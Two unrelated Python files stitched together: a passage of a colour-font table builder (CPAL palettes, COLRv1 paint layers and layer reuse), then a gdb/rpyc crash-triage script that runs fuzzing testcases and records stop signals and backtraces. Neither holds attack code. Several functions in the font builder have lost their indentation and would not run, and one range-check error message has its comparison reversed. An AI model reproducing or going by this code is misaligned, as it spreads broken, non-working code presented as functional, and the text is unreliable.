        raise NotImplementedError(version)
    self.version = colr.Version = version
    if version == 0:
        # v0 tables are stored decompiled on the ttLib table object
        self._fromOTTable(colr)
    else:
        colr.VarStore = varStore
        self.table = colr
    return self
class ColorPaletteType(enum.IntFlag):
    """CPAL palette type flags; bits 2-15 are reserved and must be zero."""

    USABLE_WITH_LIGHT_BACKGROUND = 0x0001
    USABLE_WITH_DARK_BACKGROUND = 0x0002

    @classmethod
    def _missing_(cls, value):
        # reject negative values and any value with a reserved bit set
        if isinstance(value, int):
            if value < 0 or value & 0xFFFC != 0:
                raise ValueError(f"{value} is not a valid {cls.__name__}")
        return super()._missing_(value)
# None, 'abc' or {'en': 'abc', 'de': 'xyz'}
# A label that is absent (None), a plain default-English string, or a
# localized mapping keyed by BCP47 language code.
_OptionalLocalizedString = Union[None, str, Dict[str, str]]
def buildPaletteLabels(
    labels: Iterable[_OptionalLocalizedString], nameTable: _n_a_m_e.table__n_a_m_e
) -> List[Optional[int]]:
    """Store each label in *nameTable* and return the resulting name IDs.

    A dict label is stored as a multilingual name; None maps to CPAL's
    NO_NAME_ID; any other value is stored as a default-English name.
    """
    nameIDs = []
    for label in labels:
        if isinstance(label, dict):
            nameIDs.append(nameTable.addMultilingualName(label, mac=False))
        elif label is None:
            nameIDs.append(C_P_A_L_.table_C_P_A_L_.NO_NAME_ID)
        else:
            nameIDs.append(nameTable.addMultilingualName({"en": label}, mac=False))
    return nameIDs
def buildCPAL(
    palettes: Sequence[Sequence[Tuple[float, float, float, float]]],
    paletteTypes: Optional[Sequence[ColorPaletteType]] = None,
    paletteLabels: Optional[Sequence[_OptionalLocalizedString]] = None,
    paletteEntryLabels: Optional[Sequence[_OptionalLocalizedString]] = None,
    nameTable: Optional[_n_a_m_e.table__n_a_m_e] = None,
) -> C_P_A_L_.table_C_P_A_L_:
    """Build CPAL table from list of color palettes.
    Args:
        palettes: list of lists of colors encoded as tuples of (R, G, B, A) floats
            in the range [0..1].
        paletteTypes: optional list of ColorPaletteType, one for each palette.
        paletteLabels: optional list of palette labels. Each label can be either:
            None (no label), a string (for default English labels), or a
            localized string (as a dict keyed with BCP47 language codes).
        paletteEntryLabels: optional list of palette entry labels, one for each
            palette entry (see paletteLabels).
        nameTable: optional name table where to store palette and palette entry
            labels. Required if either paletteLabels or paletteEntryLabels is set.
    Return:
        A new CPAL v0 or v1 table, if custom palette types or labels are specified.
    """
    # all palettes must have the same number of entries
    if len({len(p) for p in palettes}) != 1:
        raise ColorLibError("color palettes have different lengths")
    if (paletteLabels or paletteEntryLabels) and not nameTable:
        raise TypeError(
            "nameTable is required if palette or palette entries have labels"
        )
    cpal = C_P_A_L_.table_C_P_A_L_()
    cpal.numPaletteEntries = len(palettes[0])
    cpal.palettes = []
    for i, palette in enumerate(palettes):
        colors = []
        for j, color in enumerate(palette):
            if not isinstance(color, tuple) or len(color) != 4:
                raise ColorLibError(
                    f"In palette[{i}][{j}]: expected (R, G, B, A) tuple, got {color!r}"
                )
            if any(v > 1 or v < 0 for v in color):
                raise ColorLibError(
                    f"palette[{i}][{j}] has invalid out-of-range [0..1] color: {color!r}"
                )
            # input colors are RGBA, CPAL encodes them as BGRA
            red, green, blue, alpha = color
            colors.append(
                C_P_A_L_.Color(*(round(v * 255) for v in (blue, green, red, alpha)))
            )
        cpal.palettes.append(colors)
    # any custom types or labels require a v1 table; otherwise emit v0
    if any(v is not None for v in (paletteTypes, paletteLabels, paletteEntryLabels)):
        cpal.version = 1
        if paletteTypes is not None:
            if len(paletteTypes) != len(palettes):
                raise ColorLibError(
                    f"Expected {len(palettes)} paletteTypes, got {len(paletteTypes)}"
                )
            cpal.paletteTypes = [ColorPaletteType(t).value for t in paletteTypes]
        else:
            cpal.paletteTypes = [C_P_A_L_.table_C_P_A_L_.DEFAULT_PALETTE_TYPE] * len(
                palettes
            )
        if paletteLabels is not None:
            if len(paletteLabels) != len(palettes):
                raise ColorLibError(
                    f"Expected {len(palettes)} paletteLabels, got {len(paletteLabels)}"
                )
            cpal.paletteLabels = buildPaletteLabels(paletteLabels, nameTable)
        else:
            cpal.paletteLabels = [C_P_A_L_.table_C_P_A_L_.NO_NAME_ID] * len(palettes)
        if paletteEntryLabels is not None:
            if len(paletteEntryLabels) != cpal.numPaletteEntries:
                raise ColorLibError(
                    f"Expected {cpal.numPaletteEntries} paletteEntryLabels, "
                    f"got {len(paletteEntryLabels)}"
                )
            cpal.paletteEntryLabels = buildPaletteLabels(paletteEntryLabels, nameTable)
        else:
            cpal.paletteEntryLabels = [
                C_P_A_L_.table_C_P_A_L_.NO_NAME_ID
            ] * cpal.numPaletteEntries
    else:
        cpal.version = 0
    return cpal
# COLR v1 tables
# See draft proposal at: https://github.com/googlefonts/colr-gradients-spec
# Default alpha (fully opaque) used when a color index gives no explicit alpha.
_DEFAULT_ALPHA = VariableFloat(1.0)
def _is_colrv0_layer(layer: Any) -> bool:
# Consider as COLRv0 layer any sequence of length 2 (be it tuple or list) in which
# the first element is a str (the layerGlyph) and the second element is an int
# (CPAL paletteIndex).
# https://github.com/googlefonts/ufo2ft/issues/426
try:
layerGlyph, paletteIndex = layer
except (TypeError, ValueError):
return False
else:
return isinstance(layerGlyph, str) and isinstance(paletteIndex, int)
def _split_color_glyphs_by_version(
    colorGlyphs: _ColorGlyphsDict,
) -> Tuple[_ColorGlyphsV0Dict, _ColorGlyphsDict]:
    """Partition color glyphs into a COLRv0-only dict and a COLRv1 dict.

    A glyph goes in the v0 bucket only when every one of its layers is a
    plain (layerGlyph, paletteIndex) pair; anything else requires COLRv1.
    """
    v0Glyphs = {}
    v1Glyphs = {}
    for baseGlyph, layers in colorGlyphs.items():
        bucket = v0Glyphs if all(_is_colrv0_layer(layer) for layer in layers) else v1Glyphs
        bucket[baseGlyph] = layers
    # sanity check: every input glyph landed in exactly one bucket
    assert set(colorGlyphs) == (set(v0Glyphs) | set(v1Glyphs))
    return v0Glyphs, v1Glyphs
def _to_variable_value(
value: _ScalarInput,
minValue: _Number,
maxValue: _Number,
cls: Type[VariableValue],
) -> VariableValue:
if not isinstance(value, cls):
try:
it = iter(value)
except TypeError: # not iterable
value = cls(value)
else:
value = cls._make(it)
if value.value < minValue:
raise OverflowError(f"{cls.__name__}: {value.value} < {minValue}")
if value.value > maxValue:
raise OverflowError(f"{cls.__name__}: {value.value} < {maxValue}")
return value
# Range-checked converters for the fixed-point / integer fields used by
# the COLRv1 subtables. Each wraps _to_variable_value with the encodable
# range of the on-disk type.
_to_variable_f16dot16_float = partial(
    _to_variable_value,
    cls=VariableFloat,
    # signed 16.16 fixed point: [-2**15, 2**15 - 1/65536]
    minValue=-(2 ** 15),
    maxValue=fixedToFloat(2 ** 31 - 1, 16),
)
_to_variable_f2dot14_float = partial(
    _to_variable_value,
    cls=VariableFloat,
    # signed 2.14 fixed point: [-2.0, 2.0 - 1/16384]
    minValue=-2.0,
    maxValue=fixedToFloat(2 ** 15 - 1, 14),
)
_to_variable_int16 = partial(
    _to_variable_value,
    cls=VariableInt,
    minValue=-(2 ** 15),
    maxValue=2 ** 15 - 1,
)
_to_variable_uint16 = partial(
    _to_variable_value,
    cls=VariableInt,
    minValue=0,
    # BUG FIX: an unsigned 16-bit field tops out at 2**16 - 1 (65535);
    # the previous bound of 2**16 accepted the unencodable value 65536.
    maxValue=2 ** 16 - 1,
)
def buildColorIndex(
    paletteIndex: int, alpha: _ScalarInput = _DEFAULT_ALPHA
) -> ot.ColorIndex:
    """Build an ot.ColorIndex referencing a CPAL palette entry with alpha."""
    colorIndex = ot.ColorIndex()
    colorIndex.PaletteIndex = int(paletteIndex)
    colorIndex.Alpha = _to_variable_f2dot14_float(alpha)
    return colorIndex
def buildColorStop(
    offset: _ScalarInput,
    paletteIndex: int,
    alpha: _ScalarInput = _DEFAULT_ALPHA,
) -> ot.ColorStop:
    """Build an ot.ColorStop at `offset` pointing at a CPAL palette entry."""
    stop = ot.ColorStop()
    stop.StopOffset = _to_variable_f2dot14_float(offset)
    stop.Color = buildColorIndex(paletteIndex, alpha)
    return stop
def _to_enum_value(v: Union[str, int, T], enumClass: Type[T]) -> T:
if isinstance(v, enumClass):
return v
elif isinstance(v, str):
try:
return getattr(enumClass, v.upper())
except AttributeError:
raise ValueError(f"{v!r} is not a valid {enumClass.__name__}")
return enumClass(v)
def _to_extend_mode(v: _ExtendInput) -> ExtendMode:
    """Coerce a string/int/ExtendMode into an ExtendMode enum member."""
    return _to_enum_value(v, ExtendMode)
def _to_composite_mode(v: _CompositeInput) -> CompositeMode:
    """Coerce a string/int/CompositeMode into a CompositeMode enum member."""
    return _to_enum_value(v, CompositeMode)
def buildColorLine(
    stops: _ColorStopsList, extend: _ExtendInput = ExtendMode.PAD
) -> ot.ColorLine:
    """Build an ot.ColorLine from a list of color stops.

    Each stop may be an ot.ColorStop (used as-is), a mapping of
    buildColorStop keyword arguments, or a positional tuple for
    buildColorStop.
    """
    colorLine = ot.ColorLine()
    colorLine.Extend = _to_extend_mode(extend)
    colorLine.StopCount = len(stops)
    colorStops = []
    for stop in stops:
        if isinstance(stop, ot.ColorStop):
            colorStops.append(stop)
        elif isinstance(stop, collections.abc.Mapping):
            colorStops.append(buildColorStop(**stop))
        else:
            colorStops.append(buildColorStop(*stop))
    colorLine.ColorStop = colorStops
    return colorLine
def _to_color_line(obj):
    """Coerce `obj` to an ot.ColorLine.

    Accepts an existing ot.ColorLine (returned unchanged) or a mapping of
    buildColorLine keyword arguments; anything else raises TypeError.
    """
    if isinstance(obj, ot.ColorLine):
        return obj
    elif isinstance(obj, collections.abc.Mapping):
        return buildColorLine(**obj)
    raise TypeError(obj)
def _as_tuple(obj) -> Tuple[Any, ...]:
# start simple, who even cares about cyclic graphs or interesting field types
def _tuple_safe(value):
if isinstance(value, enum.Enum):
return value
elif hasattr(value, "__dict__"):
return tuple((k, _tuple_safe(v)) for k, v in value.__dict__.items())
elif isinstance(value, collections.abc.MutableSequence):
return tuple(_tuple_safe(e) for e in value)
return value
return tuple(_tuple_safe(obj))
def _reuse_ranges(num_layers: int) -> Generator[Tuple[int, int], None, None]:
# TODO feels like something itertools might have already
for lbound in range(num_layers):
# TODO may want a max length to limit scope of search
# Reuse of very large #s of layers is relatively unlikely
# +2: we want sequences of at least 2
# otData handles single-record duplication
for ubound in range(lbound + 2, num_layers + 1):
yield (lbound, ubound)
class LayerV1ListBuilder:
    """Accumulates the flat COLRv1 layer list shared by all base glyphs.

    Each buildColrLayers() call appends its child paints to the single
    `layers` list; `reusePool` maps a hashable snapshot of a run of layers
    to its start index in `layers`, so later glyphs can point a
    PaintColrLayers at an already-emitted slice instead of duplicating it.
    """

    # PaintColrLayers records emitted so far (one per buildColrLayers call).
    slices: List[ot.Paint]
    # The flat, shared layer list that the final LayerV1List will contain.
    layers: List[ot.Paint]
    # Snapshot-of-layer-run -> first index of that run in `layers`.
    reusePool: Mapping[Tuple[Any, ...], int]

    def __init__(self):
        self.slices = []
        self.layers = []
        self.reusePool = {}

    def buildPaintSolid(
        self, paletteIndex: int, alpha: _ScalarInput = _DEFAULT_ALPHA
    ) -> ot.Paint:
        """Build a PaintSolid from a CPAL palette index and alpha."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintSolid)
        ot_paint.Color = buildColorIndex(paletteIndex, alpha)
        return ot_paint

    def buildPaintLinearGradient(
        self,
        colorLine: _ColorLineInput,
        p0: _PointTuple,
        p1: _PointTuple,
        p2: Optional[_PointTuple] = None,
    ) -> ot.Paint:
        """Build a PaintLinearGradient; the rotation point p2 defaults to p1."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintLinearGradient)
        ot_paint.ColorLine = _to_color_line(colorLine)
        if p2 is None:
            p2 = copy.copy(p1)
        for i, (x, y) in enumerate((p0, p1, p2)):
            setattr(ot_paint, f"x{i}", _to_variable_int16(x))
            setattr(ot_paint, f"y{i}", _to_variable_int16(y))
        return ot_paint

    def buildPaintRadialGradient(
        self,
        colorLine: _ColorLineInput,
        c0: _PointTuple,
        c1: _PointTuple,
        r0: _ScalarInput,
        r1: _ScalarInput,
    ) -> ot.Paint:
        """Build a PaintRadialGradient between circles (c0, r0) and (c1, r1)."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintRadialGradient)
        ot_paint.ColorLine = _to_color_line(colorLine)
        for i, (x, y), r in [(0, c0, r0), (1, c1, r1)]:
            setattr(ot_paint, f"x{i}", _to_variable_int16(x))
            setattr(ot_paint, f"y{i}", _to_variable_int16(y))
            setattr(ot_paint, f"r{i}", _to_variable_uint16(r))
        return ot_paint

    def buildPaintGlyph(self, glyph: str, paint: _PaintInput) -> ot.Paint:
        """Build a PaintGlyph that clips `paint` to the outline of `glyph`."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintGlyph)
        ot_paint.Glyph = glyph
        ot_paint.Paint = self.buildPaint(paint)
        return ot_paint

    def buildPaintColrGlyph(self, glyph: str) -> ot.Paint:
        """Build a PaintColrGlyph referencing another color base glyph."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintColrGlyph)
        ot_paint.Glyph = glyph
        return ot_paint

    def buildPaintTransform(
        self, transform: _AffineInput, paint: _PaintInput
    ) -> ot.Paint:
        """Build a PaintTransform applying an Affine2x3 to `paint`."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintTransform)
        if not isinstance(transform, ot.Affine2x3):
            transform = buildAffine2x3(transform)
        ot_paint.Transform = transform
        ot_paint.Paint = self.buildPaint(paint)
        return ot_paint

    def buildPaintComposite(
        self,
        mode: _CompositeInput,
        source: _PaintInput,
        backdrop: _PaintInput,
    ):
        """Build a PaintComposite blending `source` over `backdrop` with `mode`."""
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintComposite)
        ot_paint.SourcePaint = self.buildPaint(source)
        ot_paint.CompositeMode = _to_composite_mode(mode)
        ot_paint.BackdropPaint = self.buildPaint(backdrop)
        return ot_paint

    def buildColrLayers(self, paints: List[_PaintInput]) -> ot.Paint:
        """Build a PaintColrLayers over `paints`, deduplicating layer runs.

        Runs of layers already present in the shared list are replaced by
        a nested PaintColrLayers pointing at the existing slice; new runs
        are registered in the reuse pool for later callers.
        """
        ot_paint = ot.Paint()
        ot_paint.Format = int(ot.Paint.Format.PaintColrLayers)
        self.slices.append(ot_paint)
        paints = [self.buildPaint(p) for p in paints]
        # Look for reuse, with preference to longer sequences
        found_reuse = True
        while found_reuse:
            found_reuse = False
            ranges = sorted(
                _reuse_ranges(len(paints)),
                key=lambda t: (t[1] - t[0], t[1], t[0]),
                reverse=True,
            )
            for lbound, ubound in ranges:
                reuse_lbound = self.reusePool.get(_as_tuple(paints[lbound:ubound]), -1)
                if reuse_lbound == -1:
                    continue
                # Replace the run with a pointer into the shared list and
                # restart the search over the (now shorter) paint list.
                new_slice = ot.Paint()
                new_slice.Format = int(ot.Paint.Format.PaintColrLayers)
                new_slice.NumLayers = ubound - lbound
                new_slice.FirstLayerIndex = reuse_lbound
                paints = paints[:lbound] + [new_slice] + paints[ubound:]
                found_reuse = True
                break
        ot_paint.NumLayers = len(paints)
        ot_paint.FirstLayerIndex = len(self.layers)
        self.layers.extend(paints)
        # Register our parts for reuse
        for lbound, ubound in _reuse_ranges(len(paints)):
            self.reusePool[_as_tuple(paints[lbound:ubound])] = (
                lbound + ot_paint.FirstLayerIndex
            )
        return ot_paint

    def buildPaint(self, paint: _PaintInput) -> ot.Paint:
        """Coerce any accepted paint description into an ot.Paint.

        Accepts an ot.Paint, an int (palette index -> PaintSolid), a
        (layerGlyph, paint) tuple (-> PaintGlyph), a list (-> implicit
        PaintColrLayers), or a mapping with a 'format' key dispatched to
        the matching build* method.
        """
        if isinstance(paint, ot.Paint):
            return paint
        elif isinstance(paint, int):
            paletteIndex = paint
            return self.buildPaintSolid(paletteIndex)
        elif isinstance(paint, tuple):
            layerGlyph, paint = paint
            return self.buildPaintGlyph(layerGlyph, paint)
        elif isinstance(paint, list):
            # implicit PaintColrLayers for a list of > 1
            if len(paint) == 0:
                raise ValueError("An empty list is hard to paint")
            elif len(paint) == 1:
                return self.buildPaint(paint[0])
            else:
                return self.buildColrLayers(paint)
        elif isinstance(paint, collections.abc.Mapping):
            kwargs = dict(paint)
            fmt = kwargs.pop("format")
            # BUG FIX: keep the KeyError handler around the table lookup
            # only, so a KeyError raised *inside* a build function is no
            # longer misreported as NotImplementedError.
            try:
                buildFunction = LayerV1ListBuilder._buildFunctions[fmt]
            except KeyError:
                raise NotImplementedError(fmt)
            return buildFunction(self, **kwargs)
        raise TypeError(f"Not sure what to do with {type(paint).__name__}: {paint!r}")

    def build(self) -> ot.LayerV1List:
        """Assemble the final LayerV1List from the accumulated layers."""
        layers = ot.LayerV1List()
        layers.LayerCount = len(self.layers)
        layers.Paint = self.layers
        return layers
# Dispatch table mapping each Paint.Format value to the corresponding
# LayerV1ListBuilder.build<FormatName> method; used by buildPaint() for
# mapping inputs. PaintColrLayers is excluded because it is built through
# buildColrLayers(), which manages the shared layer list and reuse pool.
LayerV1ListBuilder._buildFunctions = {
    pf.value: getattr(LayerV1ListBuilder, "build" + pf.name)
    for pf in ot.Paint.Format
    if pf != ot.Paint.Format.PaintColrLayers
}
def buildAffine2x3(transform: _AffineTuple) -> ot.Affine2x3:
    """Build an ot.Affine2x3 from a 6-tuple (xx, yx, xy, yy, dx, dy)."""
    if len(transform) != 6:
        raise ValueError(f"Expected 6-tuple of floats, found: {transform!r}")
    affine = ot.Affine2x3()
    # COLRv1's Affine2x3 serializes a 2D affine transformation in the same
    # column-major order as fontTools.misc.transform; only the 'xy' and
    # 'yx' labels are swapped (for historical reasons, matching FreeType
    # and Cairo). Their meaning is unchanged: the second tuple element is
    # the y-part of the x basis vector and the third is the x-part of the
    # y basis vector.
    # See https://github.com/googlefonts/colr-gradients-spec/pull/85
    for attr, value in zip(("xx", "yx", "xy", "yy", "dx", "dy"), transform):
        setattr(affine, attr, _to_variable_f16dot16_float(value))
    return affine
def buildBaseGlyphV1Record(
    baseGlyph: str, layerBuilder: LayerV1ListBuilder, paint: _PaintInput
) -> ot.BaseGlyphV1Record:
    """Build a BaseGlyphV1Record binding `baseGlyph` to its root Paint.

    Layers created while building the paint graph are appended to the
    shared layer list owned by `layerBuilder`.
    """
    # NOTE: the return annotation previously said ot.BaseGlyphV1List, but
    # the function clearly constructs and returns a BaseGlyphV1Record.
    self = ot.BaseGlyphV1Record()
    self.BaseGlyph = baseGlyph
    self.Paint = layerBuilder.buildPaint(paint)
    return self
def _format_glyph_errors(errors: Mapping[str, Exception]) -> str:
lines = []
for baseGlyph, error in sorted(errors.items()):
lines.append(f" {baseGlyph} => {type(error).__name__}: {error}")
return "\n".join(lines)
def buildColrV1(
    colorGlyphs: _ColorGlyphsDict,
    glyphMap: Optional[Mapping[str, int]] = None,
) -> Tuple[ot.LayerV1List, ot.BaseGlyphV1List]:
    """Build the COLRv1 LayerV1List and BaseGlyphV1List.

    When `glyphMap` is given, base glyph records are emitted in glyph ID
    order. Per-glyph build failures are collected and re-raised together
    as a single ColorLibError (with an `errors` attribute mapping glyph
    name to the original exception).
    """
    items = colorGlyphs.items()
    if glyphMap is not None:
        # order the base glyph records by glyph ID
        items = sorted(items, key=lambda kv: glyphMap[kv[0]])
    layerBuilder = LayerV1ListBuilder()
    baseGlyphs = []
    errors = {}
    for baseGlyph, paint in items:
        try:
            baseGlyphs.append(buildBaseGlyphV1Record(baseGlyph, layerBuilder, paint))
        except (ColorLibError, OverflowError, ValueError, TypeError) as e:
            errors[baseGlyph] = e
    if errors:
        failed_glyphs = _format_glyph_errors(errors)
        exc = ColorLibError(f"Failed to build BaseGlyphV1List:\n{failed_glyphs}")
        exc.errors = errors
        raise exc from next(iter(errors.values()))
    glyphs = ot.BaseGlyphV1List()
    glyphs.BaseGlyphCount = len(baseGlyphs)
    glyphs.BaseGlyphV1Record = baseGlyphs
    return (layerBuilder.build(), glyphs)
|
#!/usr/bin/env python3
"""
Main Script
"""
import argparse
import base64
import json
import hashlib
import os
import subprocess
import time
import rpyc
# It gets imported by base64 with the packing script
# NOTE(review): "{{ script }}" looks like a template placeholder that the
# packing step replaces with the base64-encoded gdb bootstrap script
# consumed by GDBAnalyzer._write_script() — confirm against the packer.
PACKED = "{{ script }}"

# x86-64 general-purpose registers captured in crash backtraces.
amd64_registers = [
    'rax', 'rcx', 'rdx', 'rbx',
    'rsi', 'rdi', 'rsp', 'rbp',
    'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15'
]
class Analyzer:
    """
    Base class representing a tool to analyze a testcase.

    Subclasses override analyze() to inspect one testcase and return a
    dict of findings.
    """

    def __init__(self):
        pass

    def analyze(self, testcase):
        """
        Check a testcase; subclasses return a dict of results.
        """

    def details(self):
        """
        Returns details about the tool.
        """
class GDBAnalyzer(Analyzer):
    """
    GDB version of the analyzer.

    Runs the target under gdb (itself wrapped in coreutils `timeout`),
    drives it through an rpyc bridge injected by a bootstrap script, and
    collects the stop signal plus a register-annotated backtrace when the
    inferior stops.
    """

    # rpyc connection to the gdb-side server; established by start_gdb().
    conn = None

    def __init__(self,
                 binary,
                 binargs=None,
                 stdin=False,
                 timeout=30,
                 script_path='/tmp/.script.py',
                 wait_time=0.5,
                 memory=500000000):
        """
        :param binary: path of the binary to analyze
        :param binargs: argv for the binary; '@@' is replaced with the
            testcase path. BUG FIX: the old `binargs=[]` mutable default
            was shared between every GDBAnalyzer instance.
        :param stdin: feed the testcase on stdin instead of as an argument
        :param timeout: seconds before `timeout` sends gdb a SIGINT
        :param script_path: where to write the gdb bootstrap script
        :param wait_time: seconds to wait for gdb's rpyc server to listen
        :param memory: address-space limit (bytes) for the child process
        """
        super().__init__()
        self.binary = binary
        self.binargs = [] if binargs is None else binargs
        # as we use rpyc to talk to gdb we have to set these.
        self.host = '127.0.0.1'
        self.port = 1337
        self.timeout = timeout
        self.script_path = script_path
        # Essentially, how long to wait for GDB to start up and listen
        self.wait_time = wait_time
        self.stdin = stdin
        self.memory = memory

    def analyze(self, testcase):
        """
        Analyze the testcase; returns {} if gdb timed out or the rpyc
        connection was lost.
        """
        result = {}
        try:
            gdb = self.start_gdb()
            result = self.gdb_work(gdb, testcase)
            self.conn.close()
        except EOFError:
            # This happens in the case of timeouts.
            pass
        return result

    def _gdbcmd(self, params):
        """
        Generate the gdb command line; `params` become KEY="value" pairs
        executed via gdb's `py` command so the bootstrap script can read
        them.
        """
        args_s = 'py '
        args_l = [
            '{}="{}"'.format(key, value) for key, value in params.items()
        ]
        args_s += ';'.join(args_l)
        # Runs GDB by a timeout.
        # If it still hasn't finished after `timeout` time, it receives a
        # SIGINT which should allow gdb to finish its analysis so we can
        # move on.
        # Annoyingly, in some cases this timeout may cause GDB to coredump.
        gdb_cmd = [
            'timeout', '-s', 'INT', str(self.timeout),
            'gdb', '-nx', '--batch-silent',
            '-ex', args_s,
            '-x', self.script_path,
            self.binary
        ]
        return gdb_cmd

    def gdb_work(self, gdb, testcase):
        """
        Drive gdb over one testcase: install a stop handler, start the
        inferior (stdin or argv input), apply the memory limit, continue,
        and poll until the inferior stops. Returns the handler's result.
        """
        gdb.execute('set pagination off')
        # setup the crash handlers
        result = {}

        def backtracer(frame):
            """
            Gets the full stack backtrace starting at `frame`.
            """
            backtrace = []
            curr_frame = frame
            # while the api docs say gdb.Architecture should include the
            # registers, it actually doesn't at least on gdb 9.2, so we
            # have to manually handle x86's registers here.
            # NOTE(review): registers are sampled once from the newest
            # frame and attached to every backtrace entry — confirm this
            # is intentional.
            registers = {}
            for register in amd64_registers:
                registers[register] = ('0x%016x' %
                                       curr_frame.read_register(register))
            while curr_frame is not None:
                backtrace.append(
                    {
                        'address': '0x%016x' % curr_frame.pc(),
                        'function': '%s' % curr_frame.name(),
                        'registers': registers
                    }
                )
                curr_frame = curr_frame.older()
            return backtrace

        def crash_handler(event):
            """
            Records the stop signal and backtrace into `result`.
            """
            nonlocal result
            reason = ''
            backtrace = []
            try:
                reason = event.stop_signal
                frame = gdb.newest_frame()
                backtrace = backtracer(frame)
            except Exception:
                # we get a lot of non-real exceptions from rpyc, so we
                # have to skip over them like this.
                pass
            # return the results
            result = {
                'reason': reason,
                'backtrace': backtrace
            }

        gdb.events.stop.connect(crash_handler)
        # quick way to test the timeout behavior
        # gdb.execute('!sleep 35')
        path = testcase.details()['path']
        # sort out the CLI args: '@@' is a placeholder for the testcase
        real = []
        for arg in self.binargs:
            if arg == '@@':
                real.append(path)
            else:
                real.append(arg)
        # Start the program in different ways depending on how it takes
        # input, i.e. stdin or as a cli flag
        if self.stdin:
            gdb.execute(
                'starti %s < %s 2>/dev/null' % (" ".join(real), path)
            )
        else:
            gdb.execute('starti %s 2>/dev/null' % " ".join(real))
        # do stuff like setup memory limits here, before progressing past
        # the entry point.
        inferior = gdb.selected_inferior()
        # hack to limit the memory of a child process.
        # requires modern linux, greater than 2.6.36.
        prlimit = \
            '!prlimit --pid %i --core=unlimited --as=%i' % \
            (inferior.pid, self.memory)
        gdb.execute(prlimit)
        # and now start
        gdb.execute('c')
        # now we wait til an error occurs.
        while True:
            thread = gdb.selected_thread()
            if thread and thread.is_running():
                time.sleep(0.01)
            else:
                break
        return result

    @staticmethod
    def _write_script(path):
        """
        Decode the packed gdb bootstrap script and write it to `path`.
        BUG FIX: use a context manager so the handle is closed even when
        the write fails.
        """
        with open(path, 'wb') as filep:
            filep.write(base64.b64decode(PACKED))
        return path

    def start_gdb(self):
        """
        Launch gdb with the bootstrap script and return the remote gdb
        module proxy exposed over rpyc.
        """
        # First, we need to place the gdb bootstrap script onto disk.
        GDBAnalyzer._write_script(self.script_path)
        # invoke GDB.
        cmd = self._gdbcmd({'HOSTNAME': self.host, 'PORT': self.port})
        GDBAnalyzer.execute(cmd)
        time.sleep(self.wait_time)
        # Now connect to the GDB instance.
        # BUG FIX: use the configured host/port instead of a hard-coded
        # literal 1337 that silently ignored self.port.
        self.conn = rpyc.connect(self.host, self.port)
        return self.conn.root.gdb()

    @staticmethod
    def execute(cmd):
        """
        Wrapper to spawn a process without waiting for it.
        """
        return subprocess.Popen(cmd)
class MetaAnalyzer(Analyzer):
    """
    Gets metadata on the testcase: file size and SHA-256 digest.
    """

    def analyze(self, testcase):
        """
        Analyze the testcase.

        Returns a dict with the file's path, size in bytes and SHA-256
        hex digest.
        """
        file_path = testcase.details()['path']
        return {
            'path': file_path,
            'size': os.path.getsize(file_path),
            'hash': MetaAnalyzer._hash(file_path),
        }

    @staticmethod
    def _hash(name):
        """Return the SHA-256 hex digest of the file `name`.

        BUG FIX: the file handle was never closed on error (no context
        manager); also read in chunks so huge testcases are not slurped
        into memory at once.
        """
        fhash = hashlib.sha256()
        with open(name, 'rb') as fobj:
            for chunk in iter(lambda: fobj.read(65536), b''):
                fhash.update(chunk)
        return fhash.hexdigest()
class Testcase:
    """
    Represents a single testcase file and its accumulated analysis
    results.
    """

    def __init__(self, name, testcase_path):
        self.name = name
        self.file = testcase_path
        # BUG FIX: `results` used to be a mutable class attribute, so
        # every Testcase instance shared (and overwrote) the same dict;
        # make it per-instance.
        self.results = {}

    def details(self):
        """
        Return the name, path and per-analyzer results of this testcase.
        """
        return {'name': self.name, 'path': self.file, 'analysis': self.results}

    def update(self, key, value):
        """
        Store an analyzer's result with the testcase under `key`.
        """
        self.results[key] = value
class TriageTool:
    """
    The user facing tool: discovers testcases under a directory and runs
    every analyzer over each of them.
    """

    def __init__(self, testcase_path, binary, binargs, stdin=False, timeout=30,
                 wait_time=0.5, memory=5000000000):
        """
        :param testcase_path: directory containing testcase files
        :param binary: path of the binary to triage
        :param binargs: argv for the binary ('@@' = testcase placeholder)
        """
        # BUG FIX: all_testcases/all_analyzers used to be mutable class
        # attributes shared by every TriageTool; make them per-instance.
        self.all_testcases = {}
        self.testcase_path = testcase_path
        self.testcases()
        # define all the supported analyzers here
        self.all_analyzers = {
            'meta': MetaAnalyzer(),
            'gdb': GDBAnalyzer(binary, binargs, stdin=stdin, timeout=timeout,
                               wait_time=wait_time, memory=memory),
        }

    def run(self):
        """
        Run every analyzer over every testcase; return the list of
        testcase detail dicts.
        """
        results = []
        for testcase in self.all_testcases.values():
            for analyzer_name, analyzer in self.all_analyzers.items():
                testcase.update(analyzer_name, analyzer.analyze(testcase))
            results.append(testcase.details())
        return results

    def testcases(self):
        """
        Populate all_testcases with every regular file in testcase_path,
        keyed by full path.
        """
        for entry in os.scandir(self.testcase_path):
            if entry.is_file():
                full_path = os.path.join(self.testcase_path, entry.name)
                self.all_testcases[full_path] = Testcase(entry.name, full_path)
def save(fname, data):
    """
    Write analysis results to `fname` as JSON under a 'crashes' key.

    BUG FIX: the original ignored its `data` parameter and called the
    global `tool.run()` again, re-analyzing every testcase on save (and
    breaking if `tool` was not defined). Serialize the passed-in results
    instead, and close the file via a context manager.
    """
    with open(fname, 'w') as output:
        output.write(json.dumps({'crashes': data}))
if __name__ == "__main__":
    # CLI entry point: parse options, triage every testcase, dump JSON.
    parser = argparse.ArgumentParser(
        description='The Little Triage Tool That Could')
    parser.add_argument(
        '--stdin',
        help='the program takes stdin',
        action='store_const',
        const=True
    )
    parser.add_argument(
        '--timeout',
        help='time before sending a SIGINT',
        type=int,
        default=30
    )
    parser.add_argument(
        '--wait-time',
        help='time to sleep before attempting to connect to gdb',
        type=float,
        default=0.5
    )
    # NOTE(review): this default (500000000) differs from TriageTool's
    # own default of 5000000000 — confirm which limit is intended.
    parser.add_argument(
        '--memory',
        help='memory limit for the child process (bytes)',
        type=int,
        default=500000000
    )
    parser.add_argument(
        '--output',
        help='file to write the results to',
